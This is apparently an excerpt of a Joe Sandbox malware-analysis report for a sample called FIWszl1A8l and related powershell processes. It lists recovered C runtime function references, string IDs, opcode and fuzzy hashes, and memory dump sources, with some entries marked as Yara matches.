                                                                                                  • Instruction ID: c338a39d9f9cd2842e9328fb11d38dc152aad90a4885d41a6077474587c70027
                                                                                                  • Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                                  • Instruction Fuzzy Hash: 8501AD71D00259AFDF109FA4DC41BEEBBB9FB48364F204115E924A67D0DB749901CBB5
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 00977025
                                                                                                    • Part of subcall function 0097710D: __getptd_noexit.LIBCMT ref: 0097710D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
                                                                                                  • Instruction ID: d3a01c25250030a59380cb089c7233b6bd39c25e33029b691a2cbecb7a17f2ac
                                                                                                  • Opcode Fuzzy Hash: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
                                                                                                  • Instruction Fuzzy Hash: 250161729042599BDF009FA4DC01BEEBBB8EB44364F108115F928A6281D774D901CB65
                                                                                                  APIs
                                                                                                  • __output_l.LIBCMT ref: 03FB3AD0
                                                                                                    • Part of subcall function 03FB3BD6: __getptd_noexit.LIBCMT ref: 03FB3BD6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__output_l
                                                                                                  • String ID: B
                                                                                                  • API String ID: 2141734944-1255198513
                                                                                                  • Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction ID: ed0b57e2237dcdf396e8841c233bc630f71e4e84041f81f103997d245dda58c7
                                                                                                  • Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                  • Instruction Fuzzy Hash: 230161B99002199BDF10DFA6CC01BEEBBB8FB44364F244116E824E6280E7759501CB71
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0957F
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EF9B
                                                                                                    • Part of subcall function 02D0EF86: __CxxThrowException@8.LIBCMT ref: 02D0EFB0
                                                                                                    • Part of subcall function 02D0EF86: std::exception::exception.LIBCMT ref: 02D0EFC1
                                                                                                  • _memmove.LIBCMT ref: 02D095B5
                                                                                                  Strings
                                                                                                  • invalid string position, xrefs: 02D0957A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                  • String ID: invalid string position
                                                                                                  • API String ID: 1785806476-1799206989
                                                                                                  • Opcode ID: f1cc09ac8dc26196695033cc702a5ea1eb83aced3ff2ae3940b20ad974faac55
                                                                                                  • Instruction ID: dfca570eb95327ad330a7034dbb2d5ca63d86aa966c773c03a5d5493b212603f
                                                                                                  • Opcode Fuzzy Hash: f1cc09ac8dc26196695033cc702a5ea1eb83aced3ff2ae3940b20ad974faac55
                                                                                                  • Instruction Fuzzy Hash: 2E0144313006014BD7258A6DE9E875EB7E7DBC5904B644928D081C77DAD6B1DC4287A4
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D0D1D4
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  • _memmove.LIBCMT ref: 02D0D20D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1785806476-3788999226
                                                                                                  • Opcode ID: 3e1793caa54bac6624b49afb9c640bb96d29a13ee6af4b90037f2f2de8e944ef
                                                                                                  • Instruction ID: d2f37cff9e8c68e4d4cbfb77ae9236aa1cfd6176bc862e885d59aa3537fdc63d
                                                                                                  • Opcode Fuzzy Hash: 3e1793caa54bac6624b49afb9c640bb96d29a13ee6af4b90037f2f2de8e944ef
                                                                                                  • Instruction Fuzzy Hash: 8F01F573E401139FC704DF69E8C0D2A77D9E65021074A4A2AEC1AE3790E7F2EC248BA0
                                                                                                  APIs
                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 02D08443
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF4E
                                                                                                    • Part of subcall function 02D0EF39: __CxxThrowException@8.LIBCMT ref: 02D0EF63
                                                                                                    • Part of subcall function 02D0EF39: std::exception::exception.LIBCMT ref: 02D0EF74
                                                                                                  • _memmove.LIBCMT ref: 02D0846E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1785806476-3788999226
                                                                                                  • Opcode ID: 73639cac21f6ce81e3477eb32742910142ba40fb6b7ea67406cc98bb4557129a
                                                                                                  • Instruction ID: d8d101a61c9d3a03a4ad5df65637c9bdf199b98e8cf51af3951c8cee64efc820
                                                                                                  • Opcode Fuzzy Hash: 73639cac21f6ce81e3477eb32742910142ba40fb6b7ea67406cc98bb4557129a
                                                                                                  • Instruction Fuzzy Hash: 3C018FB16002058FDB28DEA8DCD1A2AB7DAEB54214B18492DE896C7790E670FC04CB60
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFrame@12Setting__getptd
                                                                                                  • String ID: j
                                                                                                  • API String ID: 3454690891-2137352139
                                                                                                  • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                  • Instruction ID: 3f9b2835d5b4333de25a794ca70b2c3c07f7c48da1a33638e308e6157613e334
                                                                                                  • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                  • Instruction Fuzzy Hash: 7911AD71800264DBCB12DF58C4893ACBB74BF01324F25C189E4952B6A3C374AE91DF91
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CallFrame@12Setting__getptd
                                                                                                  • String ID: j
                                                                                                  • API String ID: 3454690891-2137352139
                                                                                                  • Opcode ID: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
                                                                                                  • Instruction ID: a85191df6bd6558ee613aa495b0eb393146c38215d5f58e236f6ebcfee60ca33
                                                                                                  • Opcode Fuzzy Hash: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
                                                                                                  • Instruction Fuzzy Hash: D5115B3DC01219EFDB12DF58C1487ACBB71BB04319F158189D568ABA92C7747A91CFD2
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CallFrame@12Setting__getptd
                                                                                                  • String ID: j
                                                                                                  • API String ID: 3454690891-2137352139
                                                                                                  • Opcode ID: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
                                                                                                  • Instruction ID: a7d98c820a5e95f251b0a556e10acf4c1f01f17aa6d2baeb4073f9504c01c6d9
                                                                                                  • Opcode Fuzzy Hash: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
                                                                                                  • Instruction Fuzzy Hash: 97118B76C60292EBCB22DF5AC6647ACFB70FB00314F19808ED8682B185C770A991DB91
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 009337AF
                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __getptd.LIBCMT ref: 009337BD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 803148776-1018135373
                                                                                                  • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                  • Instruction ID: 62a475586654251051cb57b5e3c6ed56e0eda68bb4dc6cdc5d1b32e9209c9d90
                                                                                                  • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                  • Instruction Fuzzy Hash: F7014674C82205CACF38AF21D4447ADB3B9AF54311F68C82EF4919A692DB308B80DF61
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 028400A2
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __getptd.LIBCMT ref: 028400B0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 803148776-1018135373
                                                                                                  • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                  • Instruction ID: ed8e3c2f6f9e9359e80b28db09ff3006f55f39b3e768407fd236d59bca62e303
                                                                                                  • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                  • Instruction Fuzzy Hash: F4012C3C8042099BCF399F68C4407AEB7B5BF10215F64841AD6C9D6A50DF349591CF81
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D2010A: __getptd.LIBCMT ref: 02D20110
                                                                                                    • Part of subcall function 02D2010A: __getptd.LIBCMT ref: 02D20120
                                                                                                  • __getptd.LIBCMT ref: 02D206E3
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D206F1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 803148776-1018135373
                                                                                                  • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                  • Instruction ID: e12d5b611a30c081f36a0664538f13f41743bbad6f76b73c4124e63b755239c6
                                                                                                  • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                  • Instruction Fuzzy Hash: E50174388003218ECF359F20D4946ACB3B6BF3021AF24892ED05997790CB308D89CE60
                                                                                                  APIs
                                                                                                    • Part of subcall function 009832AE: __getptd.LIBCMT ref: 009832B4
                                                                                                    • Part of subcall function 009832AE: __getptd.LIBCMT ref: 009832C4
                                                                                                  • __getptd.LIBCMT ref: 009837D8
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 009837E6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 803148776-1018135373
                                                                                                  • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                  • Instruction ID: 10966d0e84b0efcf70261df17dc19424662dab2e39ffdc6874fe4cf6c3198289
                                                                                                  • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                  • Instruction Fuzzy Hash: 82016D368012058BCF34BF66C4416ACB3B9AF50B11F54C82DF49456761DB34AB81CB11
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 03FC499E
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __getptd.LIBCMT ref: 03FC49AC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 803148776-1018135373
                                                                                                  • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                  • Instruction ID: c014d4725f90911718fe9d0e543ee6b6a9cf3402e4d616ead6b647ebcccb2331
                                                                                                  • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                  • Instruction Fuzzy Hash: 37016D38C513D78FCF36DF26DA616ACB7B9BF00211F58446ED0429A690CB318980DB15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.1392220281.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_48f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: da30250c40e5b610865be2723a14489897284898507cb30f107925554a0b0b18
                                                                                                  • Instruction ID: 3dbf173d3b847c6d5983ca09752e4f592fb90439102a9e3bd6d91cb14489a8bb
                                                                                                  • Opcode Fuzzy Hash: da30250c40e5b610865be2723a14489897284898507cb30f107925554a0b0b18
                                                                                                  • Instruction Fuzzy Hash: 99914A74A006058FCB15CF58C894AAABBB1FF48310B248A99D915EB365D736FC51CBA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.1392220281.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_48f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae137896a6559976de49208b2b4c2e5458ed98c641dc1726e77627a5acaba2c8
                                                                                                  • Instruction ID: a78b33fd9acb9feceffd77e2229409dc97aaf4d4ddf262a44ed09b2afd4ca628
                                                                                                  • Opcode Fuzzy Hash: ae137896a6559976de49208b2b4c2e5458ed98c641dc1726e77627a5acaba2c8
                                                                                                  • Instruction Fuzzy Hash: 5F413974A00605DFCB0ACF58C898AAEF7B1FF48310B158A99D915AB364C732FC51CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.1391559763.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_2c6d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 692ada53857fa36ffb7d793d6bf665b58c1f82fc30eecc82e314a119ddff0dc1
                                                                                                  • Instruction ID: ab908f5eec4278c99c57a49b90e5e41ed5d8f39d4d43165d17af1c50893586df
                                                                                                  • Opcode Fuzzy Hash: 692ada53857fa36ffb7d793d6bf665b58c1f82fc30eecc82e314a119ddff0dc1
                                                                                                  • Instruction Fuzzy Hash: 4B015E6110E3C09FD7128B258894B62BFB8DF43225F1DC1DBD9888F1A3C2699849C7B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.1391559763.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_2c6d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5df349838352b629848926d38793d5bc1d3d923b0e2c96449dcaac4f7d5bad6f
                                                                                                  • Instruction ID: 564dc04638ef687118760758e1a5c7bea8c7e0551bdb60412d0446e40267e511
                                                                                                  • Opcode Fuzzy Hash: 5df349838352b629848926d38793d5bc1d3d923b0e2c96449dcaac4f7d5bad6f
                                                                                                  • Instruction Fuzzy Hash: 1001A731608340DFE7244B66C8C8B76BB98DF81225F18C41AED4A0B142C7799945C6F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1443551597.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7250000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1cb21ac527952a91babc18293ff911daed7e78c369dd7cff38a7f477ecb1fc3f
                                                                                                  • Instruction ID: da3d94a8bb704b93240c6507c82f6a20efeb8687891cd343cfd1a4bdb976ab52
                                                                                                  • Opcode Fuzzy Hash: 1cb21ac527952a91babc18293ff911daed7e78c369dd7cff38a7f477ecb1fc3f
                                                                                                  • Instruction Fuzzy Hash: 0C1269B1B2431F9FDB259B6888057AAB7A2AFC1211F14C47AD805CB341DF72CD65C7A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6d0a05ec63dd16b72412df2a33831d96b413e3ee844612cf304faed3ded126b0
                                                                                                  • Instruction ID: 4cdd3e2865826d603cc1672e2d4ae3381ad1981b7789452ebb3e54b31b63305c
                                                                                                  • Opcode Fuzzy Hash: 6d0a05ec63dd16b72412df2a33831d96b413e3ee844612cf304faed3ded126b0
                                                                                                  • Instruction Fuzzy Hash: 8D228030A05244DFDB06CFA8C894AADBBB1FF89314F2581AAD445EB362C735DD45CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a009e3de08bca0706fa93d07642aed82185d625b66bf47a09bb9f7131e9f5242
                                                                                                  • Instruction ID: c330d359b02142eef83ade14c740fd43d3e007812c1fe705e21a0511e12d1658
                                                                                                  • Opcode Fuzzy Hash: a009e3de08bca0706fa93d07642aed82185d625b66bf47a09bb9f7131e9f5242
                                                                                                  • Instruction Fuzzy Hash: 23C17A35A00208DFDB14DFA4D844AADBBB6FF84314F158569E806AB365CB74EE49CF80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34ac580c0c0db227136ff5d1866577b4776ffa0de6ce9625b306fcaf93a3ca3e
                                                                                                  • Instruction ID: 665185eb54a66455c9c808c2b505787138af4349c31c3e57d06c41e85ea713b1
                                                                                                  • Opcode Fuzzy Hash: 34ac580c0c0db227136ff5d1866577b4776ffa0de6ce9625b306fcaf93a3ca3e
                                                                                                  • Instruction Fuzzy Hash: 56D11774A01248DFDB05CFA8D488A9EFBB2FF88314F258299E954AB351C731ED45CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 104d0376271a43b109a87169bdfae8a7576b11d74095815e2a39b72363439278
                                                                                                  • Instruction ID: 267376a6cf1cc5e5ceab2ce7ec70ffd6b30eece1247474f61c8cf081cf7eed55
                                                                                                  • Opcode Fuzzy Hash: 104d0376271a43b109a87169bdfae8a7576b11d74095815e2a39b72363439278
                                                                                                  • Instruction Fuzzy Hash: 8F91B070A00605CFDB15CF59C894AAEFBB1FF88314B248599D816EB361C735ED51CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c60333df0eee7c6a890d74c07b2d94f279f2de94a4237bf328e8d3584d59b14a
                                                                                                  • Instruction ID: 88d4d7957da7f7d60fb388d9476f5070f9395b01c8202e62c6d632c97401de41
                                                                                                  • Opcode Fuzzy Hash: c60333df0eee7c6a890d74c07b2d94f279f2de94a4237bf328e8d3584d59b14a
                                                                                                  • Instruction Fuzzy Hash: 29711830E002089FDB15DFA5D894BADFBF2BF88344F148869D412AB790DB75AD4ACB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 015c1443731824a8fac11e3ee6f0c08dc9607ee2dfbe79fda4c1ec6dfeb8bcb7
                                                                                                  • Instruction ID: d0ba099b000f69e10fc961bd073810caf1e4b7c3a5b371a5c7d577a2d403a40f
                                                                                                  • Opcode Fuzzy Hash: 015c1443731824a8fac11e3ee6f0c08dc9607ee2dfbe79fda4c1ec6dfeb8bcb7
                                                                                                  • Instruction Fuzzy Hash: C3517C70A00208DFDB14DFA9D844BAEFBF2BF89350F148869D055AB350DB74AD45CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.1419497892.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_2c70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb01eed97ab565a8e553fb92e42fe203a817e3b4854185f30f755125cce61f15
                                                                                                  • Instruction ID: 6ac45314220e4e976b4da1c523b986f34f5b480d352d54aea9eb890d2b22e01c
                                                                                                  • Opcode Fuzzy Hash: bb01eed97ab565a8e553fb92e42fe203a817e3b4854185f30f755125cce61f15
                                                                                                  • Instruction Fuzzy Hash: 69418131A002088FDB16EB74C9586BEBBF6EF8D750F194869D406EB3A0DB70AD45CB50
                                                                                                  Memory Dump Source
